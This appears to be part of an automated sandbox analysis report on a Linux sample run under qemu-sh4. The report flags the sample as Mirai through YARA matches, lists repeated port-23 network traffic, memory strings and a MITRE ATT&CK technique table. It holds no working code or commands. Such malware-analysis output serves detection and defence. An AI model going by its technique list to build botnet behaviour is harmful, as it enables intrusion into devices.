    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 37300
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 38998
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 37340
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39018
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 37362
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39036
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39072
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 37404
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39100
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 37444
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39132
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 37494
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39174
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39206
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 37534
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39240
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 37586
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39276
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 37636
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 37670
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 37696
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 37718
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 37754
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 37786
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 37818
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 37844
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 37874
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39308
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39938
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39972
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 39998
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40022
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40040
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40064
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40096
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40120
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40152
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40176
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40198
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40218
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40234
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40256
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40280
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40300
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40330
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40360
    Source: /tmp/TudQawdlbF (PID: 5209)Queries kernel information via 'uname': Jump to behavior
    Source: TudQawdlbF, 5209.1.00000000a254d34e.00000000fae0ca1c.rw-.sdmp, TudQawdlbF, 5213.1.00000000a254d34e.00000000fae0ca1c.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4
    Source: TudQawdlbF, 5209.1.00000000a254d34e.00000000fae0ca1c.rw-.sdmp, TudQawdlbF, 5213.1.00000000a254d34e.00000000fae0ca1c.rw-.sdmpBinary or memory string: V7x86_64/usr/bin/qemu-sh4/tmp/TudQawdlbFSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/TudQawdlbF
    Source: TudQawdlbF, 5209.1.00000000cdce54b6.00000000f6dafd62.rw-.sdmp, TudQawdlbF, 5213.1.00000000cdce54b6.00000000f6dafd62.rw-.sdmpBinary or memory string: U5!/etc/qemu-binfmt/sh4
    Source: TudQawdlbF, 5209.1.00000000cdce54b6.00000000f6dafd62.rw-.sdmp, TudQawdlbF, 5213.1.00000000cdce54b6.00000000f6dafd62.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sh4

    Stealing of Sensitive Information:

    barindex
    Yara detected MiraiShow sources
    Source: Yara matchFile source: dump.pcap, type: PCAP

    Remote Access Functionality:

    barindex
    Yara detected MiraiShow sources
    Source: Yara matchFile source: dump.pcap, type: PCAP

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionFile Deletion1OS Credential DumpingSecurity Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

    Malware Configuration

    No configs have been found

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped